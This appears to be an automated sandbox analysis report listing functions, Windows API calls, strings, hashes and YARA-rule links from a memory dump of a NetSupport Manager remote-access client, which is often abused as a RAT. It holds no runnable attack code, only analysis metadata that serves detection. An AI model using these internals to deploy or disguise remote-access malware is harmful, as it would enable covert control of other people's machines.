                                                                                    Similarity
                                                                                    • API ID: Window$EnableVisible$Foreground$MessageOpenPostShowTextVersion__wcstoi64_memset_strncpy
                                                                                    • String ID: Client$ConnectedText$HideWhenIdle$LockedText$ShowUIOnConnect$ViewedText
                                                                                    • API String ID: 3453649892-3803836183
                                                                                    • Opcode ID: 391fd03a16533da79435ce5bee1303fc2e717428408a6b437c143b59ca9afbf1
                                                                                    • Instruction ID: ae8ec3c714d324370739ddb1cab1952d607c59122f5be0bb7ac7fd02d25128b2
                                                                                    • Opcode Fuzzy Hash: 391fd03a16533da79435ce5bee1303fc2e717428408a6b437c143b59ca9afbf1
                                                                                    • Instruction Fuzzy Hash: 86C12A75A1122A9BEB11DFF4CD80B6EF769ABC072DF140138EA159B28CEB75E804C751
                                                                                    Function 110281A0 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 130librarysynchronizationCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000102,NSM.LIC,00000009), ref: 110281F1
                                                                                      • Part of subcall function 11081B40: _strrchr.LIBCMT ref: 11081B4E
                                                                                    • wsprintfA.USER32 ref: 11028214
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 11028259
                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 1102826D
                                                                                    • wsprintfA.USER32 ref: 11028291
                                                                                    • CloseHandle.KERNEL32(?), ref: 110282A7
                                                                                    • CloseHandle.KERNEL32(?), ref: 110282B0
                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,?,?,?,NSM.LIC,00000009), ref: 11028311
                                                                                    • GetModuleHandleA.KERNEL32(00000000,00000000,?,?,?,?,?,NSM.LIC,00000009), ref: 11028325
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Handle$CloseModulewsprintf$CodeExitFileLibraryLoadNameObjectProcessSingleWait_strrchr
                                                                                    • String ID: "$Locales\%d\$NSM.LIC$SetClientResLang called, gPlatform %x$Setting resource langid=%d$\GetUserLang.exe"$pcicl32_res.dll
                                                                                    • API String ID: 512045693-419896573
                                                                                    • Opcode ID: be2a4d539e06a764388bcf1fddbdd407ba59922a3a30c161602edf8e7ebb4000
                                                                                    • Instruction ID: 7a246749baaa4a6e23861a3fd22e5cd13303056935123195fcb9bb693944541c
                                                                                    • Opcode Fuzzy Hash: be2a4d539e06a764388bcf1fddbdd407ba59922a3a30c161602edf8e7ebb4000
                                                                                    • Instruction Fuzzy Hash: B841D678E04229ABD714CF65CCD5FEAB7B9EB44709F0081A5F95897280DA71AE44CBA0
                                                                                    Function 11085E10 Relevance: 26.5, APIs: 8, Strings: 7, Instructions: 218libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(PCIINV.DLL,420B7E12,028577F0,028577E0,?,00000000,1118276C,000000FF,?,11031942,028577F0,00000000,?,?,?), ref: 11085E45
                                                                                      • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                      • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                      • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                      • Part of subcall function 1110F520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,1111022D,00000000,00000001,?,?,?,?,?,11031040), ref: 1110F53E
                                                                                    • GetProcAddress.KERNEL32(00000000,GetInventory), ref: 11085E6B
                                                                                    • GetProcAddress.KERNEL32(00000000,Cancel), ref: 11085E7F
                                                                                    • GetProcAddress.KERNEL32(00000000,GetInventoryEx), ref: 11085E93
                                                                                    • wsprintfA.USER32 ref: 11085F1B
                                                                                    • wsprintfA.USER32 ref: 11085F32
                                                                                    • wsprintfA.USER32 ref: 11085F49
                                                                                    • CloseHandle.KERNEL32(00000000,11085C70,00000001,00000000), ref: 1108609A
                                                                                      • Part of subcall function 11085A80: CloseHandle.KERNEL32(?,74DEF550,?,?,110860C0,?,11031942,028577F0,00000000,?,?,?), ref: 11085A98
                                                                                      • Part of subcall function 11085A80: CloseHandle.KERNEL32(?,74DEF550,?,?,110860C0,?,11031942,028577F0,00000000,?,?,?), ref: 11085AAB
                                                                                      • Part of subcall function 11085A80: CloseHandle.KERNEL32(?,74DEF550,?,?,110860C0,?,11031942,028577F0,00000000,?,?,?), ref: 11085ABE
                                                                                      • Part of subcall function 11085A80: FreeLibrary.KERNEL32(00000000,74DEF550,?,?,110860C0,?,11031942,028577F0,00000000,?,?,?), ref: 11085AD1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseHandlewsprintf$AddressProc$Library$CreateEventFreeLoad_malloc_memset
                                                                                    • String ID: %s_HF.%s$%s_HW.%s$%s_SW.%s$Cancel$GetInventory$GetInventoryEx$PCIINV.DLL
                                                                                    • API String ID: 4263811268-2492245516
                                                                                    • Opcode ID: f5aef0daa14bc6ea66726438fc532167d4c8a127bd90decb683372eff0d319c6
                                                                                    • Instruction ID: c264ff3baa83c9e34b1ea5f373b83d9ca187d225ad452563e08076ac2ec7b834
                                                                                    • Opcode Fuzzy Hash: f5aef0daa14bc6ea66726438fc532167d4c8a127bd90decb683372eff0d319c6
                                                                                    • Instruction Fuzzy Hash: 40718175E0874AABEB14CF75CC46BDBFBE4AB48304F10452AE956D7280EB71A500CB95
                                                                                    Function 110304B8 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 190synchronizationlibraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • OpenMutexA.KERNEL32(001F0001,00000000,PCIMutex), ref: 110305F3
                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,PCIMutex), ref: 1103060A
                                                                                    • GetProcAddress.KERNEL32(?,SetProcessDPIAware), ref: 110306AC
                                                                                    • SetLastError.KERNEL32(00000078), ref: 110306C2
                                                                                    • WaitForSingleObject.KERNEL32(?,000001F4), ref: 110306FC
                                                                                    • CloseHandle.KERNEL32(?), ref: 11030709
                                                                                    • FreeLibrary.KERNEL32(?), ref: 11030714
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 1103071B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseHandleMutex$AddressCreateErrorFreeLastLibraryObjectOpenProcSingleWait
                                                                                    • String ID: /247$PCIMutex$SOFTWARE\Policies\NetSupport\Client\standard$SetProcessDPIAware$_debug\trace$_debug\tracefile$istaUI
                                                                                    • API String ID: 2061479752-1320826866
                                                                                    • Opcode ID: 344344da4f24c17c6c11c64113ed1526ed618b4690303f5ba055bceda43c688d
                                                                                    • Instruction ID: 4511418fabb8e143c6e2e60e2068ec6a59f08b67eb8208c825473cc9362a61df
                                                                                    • Opcode Fuzzy Hash: 344344da4f24c17c6c11c64113ed1526ed618b4690303f5ba055bceda43c688d
                                                                                    • Instruction Fuzzy Hash: 72613774E1635AAFEB10DFB09C44B9EB7B4AF8470DF1000A9D919A71C5EF70AA44CB51
                                                                                    Function 11106100 Relevance: 24.7, APIs: 9, Strings: 5, Instructions: 153COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetTickCount.KERNEL32 ref: 1110612E
                                                                                    • EnterCriticalSection.KERNEL32(111F060C), ref: 11106137
                                                                                    • GetTickCount.KERNEL32 ref: 1110613D
                                                                                    • GetTickCount.KERNEL32 ref: 11106190
                                                                                    • LeaveCriticalSection.KERNEL32(111F060C), ref: 11106199
                                                                                    • GetTickCount.KERNEL32 ref: 111061CA
                                                                                    • LeaveCriticalSection.KERNEL32(111F060C), ref: 111061D3
                                                                                    • EnterCriticalSection.KERNEL32(111F060C), ref: 111061FC
                                                                                    • LeaveCriticalSection.KERNEL32(111F060C,00000000,?,00000000), ref: 111062C3
                                                                                      • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                      • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                      • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                      • Part of subcall function 110F0CF0: InitializeCriticalSection.KERNEL32(00000038,00000000,00000000,?,00000000,?,11106267,?), ref: 110F0D1B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$CountTick$Leave$Enter$Initialize_malloc_memsetwsprintf
                                                                                    • String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock$e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp$info. new psi(%d) = %x$psi
                                                                                    • API String ID: 1574099134-3013461081
                                                                                    • Opcode ID: e4cf314df931be329bed10d82e2fbe7145bba63e1bcfccc88a3091ef951cf9c4
                                                                                    • Instruction ID: 01093d0ef8ba3b8d66a1f5e3f4838d53f0bc1b4d1e9212342b6ef41ebc516d7c
                                                                                    • Opcode Fuzzy Hash: e4cf314df931be329bed10d82e2fbe7145bba63e1bcfccc88a3091ef951cf9c4
                                                                                    • Instruction Fuzzy Hash: 64410E79F0411AABD700DFA59C81E9EFBB9EB8462CF524535F909E7240EA306904CBE1
                                                                                    Function 1102C410 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 238synchronizationCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 1110F340: SetEvent.KERNEL32(00000000,?,1102C44F), ref: 1110F364
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102C455
                                                                                    • GetTickCount.KERNEL32 ref: 1102C47A
                                                                                      • Part of subcall function 110D0710: __strdup.LIBCMT ref: 110D072A
                                                                                    • GetTickCount.KERNEL32 ref: 1102C574
                                                                                      • Part of subcall function 110D1370: wvsprintfA.USER32(?,?,1102C511), ref: 110D139B
                                                                                      • Part of subcall function 110D07C0: _free.LIBCMT ref: 110D07ED
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102C66C
                                                                                    • CloseHandle.KERNEL32(?), ref: 1102C688
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CountObjectSingleTickWait$CloseEventHandle__strdup_freewvsprintf
                                                                                    • String ID: ?IP=%s$GeoIP$GetLatLong=%s, took %d ms$IsA()$LatLong$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://geo.netsupportsoftware.com/location/loca.asp
                                                                                    • API String ID: 596640303-1725438197
                                                                                    • Opcode ID: 609e97f705776535a990b82a8e5f18e172a35da44f01400c4fa73658ea828b55
                                                                                    • Instruction ID: 59613557395ae23f7967247d4baf4cae7550bfc3229e85cd4bc92fe2e2f2b4a8
                                                                                    • Opcode Fuzzy Hash: 609e97f705776535a990b82a8e5f18e172a35da44f01400c4fa73658ea828b55
                                                                                    • Instruction Fuzzy Hash: 6B818275E0020AABDF04DBE8CD94FEEF7B5AF59708F504258E82567284DB34BA05CB61
                                                                                    Function 11061700 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 135registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?,00000000,?,?), ref: 1106175A
                                                                                      • Part of subcall function 11061140: RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 1106117C
                                                                                      • Part of subcall function 11061140: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 110611D4
                                                                                    • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 110617AB
                                                                                    • RegEnumKeyExA.ADVAPI32(?,00000001,?,00000100,00000000,00000000,00000000,00000000), ref: 11061865
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 11061881
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Enum$Open$CloseValue
                                                                                    • String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
                                                                                    • API String ID: 2823542970-1528906934
                                                                                    • Opcode ID: 4cf0c36994a383612a719e249f3f276c0f36ade9332230c7c569e8670290d878
                                                                                    • Instruction ID: 3a074a016260bf88f68c0586b8c591cabbb012c9b5ad66670ab8b6bf40d046b4
                                                                                    • Opcode Fuzzy Hash: 4cf0c36994a383612a719e249f3f276c0f36ade9332230c7c569e8670290d878
                                                                                    • Instruction Fuzzy Hash: 5F416179E4022DABD724CB55CC81FEAB7BCEB94748F1001D9EA48A6140D6B06E84CFA1
                                                                                    Function 11137630 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 130COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                    • GetTickCount.KERNEL32 ref: 11137692
                                                                                      • Part of subcall function 11096970: CoInitialize.OLE32(00000000), ref: 11096984
                                                                                      • Part of subcall function 11096970: CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,1113769B), ref: 1109699E
                                                                                      • Part of subcall function 11096970: CoCreateInstance.OLE32(?,00000000,00000001,111C08AC,?,?,?,?,?,?,?,1113769B), ref: 110969BB
                                                                                      • Part of subcall function 11096970: CoUninitialize.OLE32(?,?,?,?,?,?,1113769B), ref: 110969D9
                                                                                    • GetTickCount.KERNEL32 ref: 111376A1
                                                                                    • _memset.LIBCMT ref: 111376E3
                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 111376F9
                                                                                    • _strrchr.LIBCMT ref: 11137708
                                                                                    • _free.LIBCMT ref: 1113775A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CountTick$CreateFileFromInitializeInstanceModuleNameProgUninitialize__wcstoi64_free_memset_strrchr
                                                                                    • String ID: *AutoICFConfig$Client$ICFConfig$ICFConfig2 returned 0x%x$IsICFPresent() took %d ms$IsICFPresent...$No ICF present
                                                                                    • API String ID: 711243594-1270230032
                                                                                    • Opcode ID: 4f0f92e27c35dbd641ed9010d5cad7dccc431a8d4141c0f1938ec124a93e63f3
                                                                                    • Instruction ID: 94b21c48fabd249aebac1ca0d473d12a11480cc4bb4ab1ee9f0f9b3b40903c19
                                                                                    • Opcode Fuzzy Hash: 4f0f92e27c35dbd641ed9010d5cad7dccc431a8d4141c0f1938ec124a93e63f3
                                                                                    • Instruction Fuzzy Hash: 9941AE7AE0022E97C710DF756C89BEFF7699B5471DF040079E90493140EAB1AD44CBE1
                                                                                    Function 11133E80 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 11145440: _memset.LIBCMT ref: 11145485
                                                                                      • Part of subcall function 11145440: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114549E
                                                                                      • Part of subcall function 11145440: LoadLibraryA.KERNEL32(kernel32.dll), ref: 111454C5
                                                                                      • Part of subcall function 11145440: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111454D7
                                                                                      • Part of subcall function 11145440: FreeLibrary.KERNEL32(00000000), ref: 111454EF
                                                                                      • Part of subcall function 11145440: GetSystemDefaultLangID.KERNEL32 ref: 111454FA
                                                                                    • AdjustWindowRectEx.USER32(111417B8,00CE0000,00000001,00000001), ref: 11133EC7
                                                                                    • LoadMenuA.USER32(00000000,000003EC), ref: 11133ED8
                                                                                    • GetSystemMetrics.USER32(00000021), ref: 11133EE9
                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 11133EF1
                                                                                    • GetSystemMetrics.USER32(00000004), ref: 11133EF7
                                                                                    • GetDC.USER32(00000000), ref: 11133F03
                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 11133F0E
                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 11133F1A
                                                                                    • CreateWindowExA.USER32(00000001,NSMWClass,02840900,00CE0000,80000000,80000000,111417B8,?,00000000,?,11000000,00000000), ref: 11133F6F
                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,110F7D09,00000001,111417B8,_debug), ref: 11133F77
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
